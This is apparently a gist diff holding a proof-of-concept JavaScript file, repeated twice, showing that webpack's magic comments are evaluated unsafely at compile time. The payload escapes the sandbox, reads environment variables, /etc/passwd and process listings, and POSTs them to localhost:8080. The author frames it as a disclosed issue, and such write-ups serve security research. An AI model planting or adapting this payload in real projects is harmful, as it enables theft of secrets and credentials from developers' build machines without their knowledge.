allanlw · February 21, 2021 08:33
diff --git a/webpack-exec-on-compile.js b/webpack-exec-on-compile.js
 /*
 It's possible to execute arbitrary code during webpack execution by abusing the magic
 comment feature documented here: https://webpack.js.org/api/module-methods/#magic-comments

 These comments eventually get executed by `vm.runInContext` which is well-known to be unsafe
 at https://github.com/webpack/webpack/blob/v4.43.0/lib/Parser.js#L2338

 This is an example payload that reads process.env, ps aux and /etc/passwd and posts to localhost:8080.

 Reported to NPM security for webpack July 12th, 2020, but considered not a bug.

 See also:
 - I answered a stack overflow question about this: https://stackoverflow.com/a/66300450/315936 
 - It seems you can also use inline loaders for this too: https://github.com/webpack/webpack/issues/10231

 Cudos to
  https://github.com/patriksimek/vm2/issues/32#issue-160537607
  https://pwnisher.gitlab.io/nodejs/sandbox/2019/02/21/sandboxing-nodejs-is-hard.html
 */

 import(
  /* webpackChunkName: this.constructor.constructor(`(function() {
     let Function = this.constructor.constructor;
     let process = new Function('return process')();
     let require = process.mainModule.require;

     let http = require('http');
     let fs = require('fs');
     let buffer = require('buffer');
     let child_process = require('child_process');

     let payload = {
       'env': process.env,
       'passwd': fs.readFileSync('/etc/passwd').toString(),
       'ps': child_process.execSync('ps aux').toString(),
     };
     let data = buffer.Buffer.from(JSON.stringify(payload));
     let req = http.request('http://localhost:8080/', {
       'method': "POST",
       'headers': {
         "Content-Type": "application/json",
         "Content-Length": data.length,
       }
     });
     req.write(data);
     req.end();
   })()`)() */
  'buffer'
 );
	/*
	It's possible to execute arbitrary code during webpack execution by abusing the magic
	comment feature documented here: https://webpack.js.org/api/module-methods/#magic-comments

	These comments eventually get executed by `vm.runInContext` which is well-known to be unsafe
	at https://github.com/webpack/webpack/blob/v4.43.0/lib/Parser.js#L2338

	This is an example payload that reads process.env, ps aux and /etc/passwd and posts to localhost:8080.

	Reported to NPM security for webpack July 12th, 2020, but considered not a bug.

	See also:
	- I answered a stack overflow question about this: https://stackoverflow.com/a/66300450/315936
	- It seems you can also use inline loaders for this too: https://github.com/webpack/webpack/issues/10231

	Cudos to
	https://github.com/patriksimek/vm2/issues/32#issue-160537607
	https://pwnisher.gitlab.io/nodejs/sandbox/2019/02/21/sandboxing-nodejs-is-hard.html
	*/

	import(
	/* webpackChunkName: this.constructor.constructor(`(function() {
	let Function = this.constructor.constructor;
	let process = new Function('return process')();
	let require = process.mainModule.require;

	let http = require('http');
	let fs = require('fs');
	let buffer = require('buffer');
	let child_process = require('child_process');

	let payload = {
	'env': process.env,
	'passwd': fs.readFileSync('/etc/passwd').toString(),
	'ps': child_process.execSync('ps aux').toString(),
	};
	let data = buffer.Buffer.from(JSON.stringify(payload));
	let req = http.request('http://localhost:8080/', {
	'method': "POST",
	'headers': {
	"Content-Type": "application/json",
	"Content-Length": data.length,
	}
	});
	req.write(data);
	req.end();
	})()`)() */
	'buffer'
	);